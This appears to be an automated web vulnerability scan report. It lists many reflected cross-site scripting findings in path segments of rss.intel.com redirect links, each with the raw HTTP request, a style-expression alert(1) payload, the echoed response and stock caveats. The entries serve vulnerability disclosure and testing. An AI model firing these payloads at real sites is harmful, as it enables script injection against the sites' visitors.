GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31bac26"style%3d"x%3aexpression(alert(1))"4f9f28749e/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31bac26"style="x:expression(alert(1))"4f9f28749e/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28736"style%3d"x%3aexpression(alert(1))"42af1674784 was submitted in the REST URL parameter 10. This input was echoed as 28736"style="x:expression(alert(1))"42af1674784 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard28736"style%3d"x%3aexpression(alert(1))"42af1674784 HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard28736"style="x:expression(alert(1))"42af1674784?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c387"style%3d"x%3aexpression(alert(1))"2f6f6c3797a was submitted in the REST URL parameter 2. This input was echoed as 1c387"style="x:expression(alert(1))"2f6f6c3797a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-2641381c387"style%3d"x%3aexpression(alert(1))"2f6f6c3797a/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-2641381c387"style="x:expression(alert(1))"2f6f6c3797a"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d31a"style%3d"x%3aexpression(alert(1))"60bb2fac834 was submitted in the REST URL parameter 3. This input was echoed as 1d31a"style="x:expression(alert(1))"60bb2fac834 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com1d31a"style%3d"x%3aexpression(alert(1))"60bb2fac834/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com1d31a"style="x:expression(alert(1))"60bb2fac834/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b1a"style%3d"x%3aexpression(alert(1))"b8c17ee6eac was submitted in the REST URL parameter 4. This input was echoed as 65b1a"style="x:expression(alert(1))"b8c17ee6eac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community65b1a"style%3d"x%3aexpression(alert(1))"b8c17ee6eac/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community65b1a"style="x:expression(alert(1))"b8c17ee6eac/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69694"style%3d"x%3aexpression(alert(1))"cb56d7389f was submitted in the REST URL parameter 5. This input was echoed as 69694"style="x:expression(alert(1))"cb56d7389f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom69694"style%3d"x%3aexpression(alert(1))"cb56d7389f/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom69694"style="x:expression(alert(1))"cb56d7389f/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c12c9"style%3d"x%3aexpression(alert(1))"c871cd23475 was submitted in the REST URL parameter 6. This input was echoed as c12c9"style="x:expression(alert(1))"c871cd23475 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blogc12c9"style%3d"x%3aexpression(alert(1))"c871cd23475/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogc12c9"style="x:expression(alert(1))"c871cd23475/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8552d"style%3d"x%3aexpression(alert(1))"1e321e64d44 was submitted in the REST URL parameter 7. This input was echoed as 8552d"style="x:expression(alert(1))"1e321e64d44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/20118552d"style%3d"x%3aexpression(alert(1))"1e321e64d44/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/20118552d"style="x:expression(alert(1))"1e321e64d44/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e56d"style%3d"x%3aexpression(alert(1))"ea92235af50 was submitted in the REST URL parameter 8. This input was echoed as 8e56d"style="x:expression(alert(1))"ea92235af50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/028e56d"style%3d"x%3aexpression(alert(1))"ea92235af50/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/028e56d"style="x:expression(alert(1))"ea92235af50/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fafef"style%3d"x%3aexpression(alert(1))"e2545db63fb was submitted in the REST URL parameter 9. This input was echoed as fafef"style="x:expression(alert(1))"e2545db63fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01fafef"style%3d"x%3aexpression(alert(1))"e2545db63fb/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01fafef"style="x:expression(alert(1))"e2545db63fb/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb668"style%3d"x%3aexpression(alert(1))"6213d7b7402 was submitted in the REST URL parameter 10. This input was echoed as eb668"style="x:expression(alert(1))"6213d7b7402 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radioeb668"style%3d"x%3aexpression(alert(1))"6213d7b7402 HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radioeb668"style="x:expression(alert(1))"6213d7b7402?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eca7"style%3d"x%3aexpression(alert(1))"a9ac5ac8d70 was submitted in the REST URL parameter 2. This input was echoed as 9eca7"style="x:expression(alert(1))"a9ac5ac8d70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-2641719eca7"style%3d"x%3aexpression(alert(1))"a9ac5ac8d70/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-2641719eca7"style="x:expression(alert(1))"a9ac5ac8d70"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb04"style%3d"x%3aexpression(alert(1))"01502404417 was submitted in the REST URL parameter 3. This input was echoed as bbb04"style="x:expression(alert(1))"01502404417 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.combbb04"style%3d"x%3aexpression(alert(1))"01502404417/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.combbb04"style="x:expression(alert(1))"01502404417/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5111a"style%3d"x%3aexpression(alert(1))"83dfca4f7dc was submitted in the REST URL parameter 4. This input was echoed as 5111a"style="x:expression(alert(1))"83dfca4f7dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community5111a"style%3d"x%3aexpression(alert(1))"83dfca4f7dc/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community5111a"style="x:expression(alert(1))"83dfca4f7dc/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d438a"style%3d"x%3aexpression(alert(1))"543ef26b9c4 was submitted in the REST URL parameter 5. This input was echoed as d438a"style="x:expression(alert(1))"543ef26b9c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroomd438a"style%3d"x%3aexpression(alert(1))"543ef26b9c4/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomd438a"style="x:expression(alert(1))"543ef26b9c4/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e1b4"style%3d"x%3aexpression(alert(1))"65332bacd22 was submitted in the REST URL parameter 6. This input was echoed as 6e1b4"style="x:expression(alert(1))"65332bacd22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog6e1b4"style%3d"x%3aexpression(alert(1))"65332bacd22/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog6e1b4"style="x:expression(alert(1))"65332bacd22/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69bd1"style%3d"x%3aexpression(alert(1))"bfde37c43e was submitted in the REST URL parameter 7. This input was echoed as 69bd1"style="x:expression(alert(1))"bfde37c43e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/201169bd1"style%3d"x%3aexpression(alert(1))"bfde37c43e/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201169bd1"style="x:expression(alert(1))"bfde37c43e/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e21a"style%3d"x%3aexpression(alert(1))"7ce44f0bd7d was submitted in the REST URL parameter 8. This input was echoed as 2e21a"style="x:expression(alert(1))"7ce44f0bd7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/022e21a"style%3d"x%3aexpression(alert(1))"7ce44f0bd7d/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/022e21a"style="x:expression(alert(1))"7ce44f0bd7d/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f5e1"style%3d"x%3aexpression(alert(1))"2081e06e0bf was submitted in the REST URL parameter 9. This input was echoed as 9f5e1"style="x:expression(alert(1))"2081e06e0bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/029f5e1"style%3d"x%3aexpression(alert(1))"2081e06e0bf/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/029f5e1"style="x:expression(alert(1))"2081e06e0bf/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2087"style%3d"x%3aexpression(alert(1))"9f34ca0a49 was submitted in the REST URL parameter 10. This input was echoed as a2087"style="x:expression(alert(1))"9f34ca0a49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-upa2087"style%3d"x%3aexpression(alert(1))"9f34ca0a49 HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-upa2087"style="x:expression(alert(1))"9f34ca0a49?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8099"style%3d"x%3aexpression(alert(1))"7fdc79223e8 was submitted in the REST URL parameter 2. This input was echoed as b8099"style="x:expression(alert(1))"7fdc79223e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172b8099"style%3d"x%3aexpression(alert(1))"7fdc79223e8/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172b8099"style="x:expression(alert(1))"7fdc79223e8"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ea1"style%3d"x%3aexpression(alert(1))"2d8c663cb48 was submitted in the REST URL parameter 3. This input was echoed as a0ea1"style="x:expression(alert(1))"2d8c663cb48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.coma0ea1"style%3d"x%3aexpression(alert(1))"2d8c663cb48/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.coma0ea1"style="x:expression(alert(1))"2d8c663cb48/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up">here</a>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f9d"style%3d"x%3aexpression(alert(1))"5528cd11f2e was submitted in the REST URL parameter 4. This input was echoed as 37f9d"style="x:expression(alert(1))"5528cd11f2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
